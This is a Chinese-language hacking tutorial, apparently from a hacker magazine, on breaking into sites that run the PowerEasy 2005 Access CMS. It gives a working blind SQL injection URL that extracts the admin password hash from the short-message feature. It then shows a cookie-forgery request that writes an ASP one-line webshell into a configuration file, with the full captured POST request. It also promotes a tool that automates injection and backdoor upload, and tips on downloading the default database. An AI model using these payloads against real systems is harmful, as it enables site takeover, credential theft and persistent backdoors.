好久没写文章了，此文主要给大家讲解二个技巧：一是灵巧的注入；二是不进后台巧妙的上传WebShell。希望各位朋友能举一反三，有不当之处请高手指教。
一、注入漏洞
因一朋友想让帮他看一个站，装的是动易2005ACCESS版，以前和LLIKZ发现动易SQL版存在短消息注入漏洞，因为能执行多语句所以利用起来相对容易一些（其实ACCESS也存在漏洞，因手工猜测起来比较麻烦，所以就一保留了，哈哈）。此站的漏洞同样是在短消息这个地方，不同的是它是ACCESS版，首先注册一个用户，然后登录，如果进入后用户控制面板没有短消息功能，你可以试试在网址中输入http://www.***.com/user/user_message.asp 先给自己发一个短消息然后在删短消息，如果我们在删除的短消息的能数MessageID=1; 后加一个分号系统返回“语法错误 在查询表达式 'Incept='admin' and ID in (4;)' 中。”说明存在注入漏洞。如下图所示：

为什么报错呢？大家仔细看一下，在SQL中in后面应该是一个集合，但是4后面多了一个分号这样就不出现了语法错误。经过测试发现只有存在语法错误的时候才会报错，哪怎么能通过这个报错来实现注入呢？因此想到了iif语句，构造的语句如下：/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=1)and%201=(select%20top%201%20iif(asc(mid(password,1,1))<96,1,password)%20from%20pe_admin 接下来给大家分析一下为什么要构造这样的语句呢？因为根据加分号的报错情况来看短消息后面还有一个右括号，以补足in条件，所以在构造的注入语句MessageID=1后面加了一个右括号，表名pe_admin后面为什么没加右括号是因为借用了in条件语句的右括号。接下来我们在看看关键的语句iif(asc(mid(password,1,1))<96,1,password)，asc(mid(password,1,1))<96的意思是判断password字段的第一位的ASCII值是否大于96，整个iif语句的意思是，如果password字段的第一位的ASCII值是否小于96，就返回1，否则返回password。如果返回1，select语句返回的结果是1=1因此是正确的，会出现如下图：

相反如果如果password字段的第一位的ASCII值是不小于96，则返加字段的值，1=psssword的值时会出现如下提示：“标准表达式中数据类型不匹配。”

这样就可以根据返回不同的信息进行爆破了。
二、上传漏洞
以上注入说完了，在来谈谈如何不进后台上传，在这里给大家提供一种上传思路——cookie欺骗式上传。看有关“顶部栏目菜单管理”的文件Admin_RootClass_Menu.asp，包括如下几个头文件
    //数据库连接文件
//有关函数定义的文件
//检查管理权限的文件
//顶部栏目菜单设置文件
如果确定是管理员以后，会把我们设置的参数的内容写到RootClass_Menu_Config.asp文件中，如果来绕过Admin_ChkPurview.asp这个文件呢？大家看它有这样一段代码：
'检查管理员是否登录
AdminName = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminName")))//管理员名
AdminPassword = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminPassword")))//管理员md5密码
RndPassword = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("RndPassword")))//管理员的一个随机密码
程序就是通过这三个变量确定是不是管理员，而且它们都是在Cookies中取得的，这样我们就可以通过抓包Cookie欺骗了。
具体方法：先在本地机器装好系统，登录后台，点击顶部栏目菜单管理，在菜单背景图片：栏中按填入如下代码：
"%> <%'然后抓包如下：
POST /admin/Admin_RootClass_Menu.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 178.126.0.234
Content-Length: 1009
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCSBQACQ=IFFFGAKDHJPAJJCCDGOKMOEN; SendMessage=Yes; 1781260234=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8&CookieDate=1; VisitNum=1

RCM_Menu_1=4&RCM_Menu_2=0&RCM_Menu_3=0&RCM_Menu_4=2&RCM_Menu_5=3&RCM_Menu_6=6&RCM_Menu_7=7&RCM_Menu_8=100&RCM_Menu_9=filter%3AGlow%28Color%3D%23000000%2C+Strength%3D3%29&RCM_Menu_10=4&RCM_Menu_12=23&RCM_Menu_13=50&RCM_Menu_14=2&RCM_Menu_15=4&RCM_Menu_16=%23999999&RCM_Menu_17=%23ffffff&RCM_Menu_18=%22%25%3E%3CSCRIPT+RUNAT%3DSERVER+LANGUAGE%3DJAVASCRIPT%3Eeval%28Request.form%28%27yongger%27%29%2B%27%27%29%3C%2FSCRIPT%3E%3C%25%27&RCM_Menu_19=3&RCM_Menu_20=1&RCM_Menu_21=1&RCM_Menu_22=%23ACA899&RCM_Item_12=&RCM_Item_13=&RCM_Item_14=0&RCM_Item_15=0&RCM_Item_16=0&RCM_Item_17=&RCM_Item_18=&RCM_Item_19=0&RCM_Item_20=0&RCM_Item_21=0&RCM_Item_22=0&RCM_Item_23=1&RCM_Item_24=%23F1F2EE&RCM_Item_25=1&RCM_Item_26=%23CCCCCC&RCM_Item_27=1&RCM_Item_28=&RCM_Item_29=&RCM_Item_30=3&RCM_Item_32=0&RCM_Item_33=0&RCM_Item_34=%23FFFFF7&RCM_Item_35=%23FF0000&RCM_Item_36=%23000000&RCM_Item_37=%23CC0000&RCM_Item_38=9pt+%CB%CE%CC%E5&RCM_Item_39=9pt+%CB%CE%CC%E5&Action=SaveConfig&ChannelID=1&cmdSave=+%B1%A3%B4%E6%C9%E8%D6%C3+
修改抓包内容：Referer: http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1和Host: 178.126.0.234的主机名改成目标主机名；1781260234=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8除了AdminName、RndPassword和AdminPassword的内容换成目标站的以外，1781260234这一串字符也要换成目标站的url去掉字符点以后的内容，有的朋友也许看出来的1781260234正好是我的IP去掉点后的内容，如果你的是址名www.abc.com改成如下：wwwabccom，改改完毕后利用NC提交就可以了。提交成功之后文件RootClass_Menu_Config.asp内容如下图：

三、动易上传漏洞黑防专版
为方便各位朋友的使用，偶编了一个程序，如果对方存在注入漏洞，先注册一用户，保存cookie并给自己发送一短消息然后点开始即可爆出RndPassword和Password，程序没有爆管理员用户名需用户自己填上，然后点击上传，如发现对话框“上传成功”，你就可以使用冰狐一句话后门了。同进站点返回的信息会显示在最下面的空白框中。

小技巧：很多网站利用的默认数据库http://www.***.com/database/powereasy5.mdb，下载后直接填入RndPassword,Password和管理员名就可以上传后门了。
声明：利用此程序选成不良后果自付，与作者和黑防无关！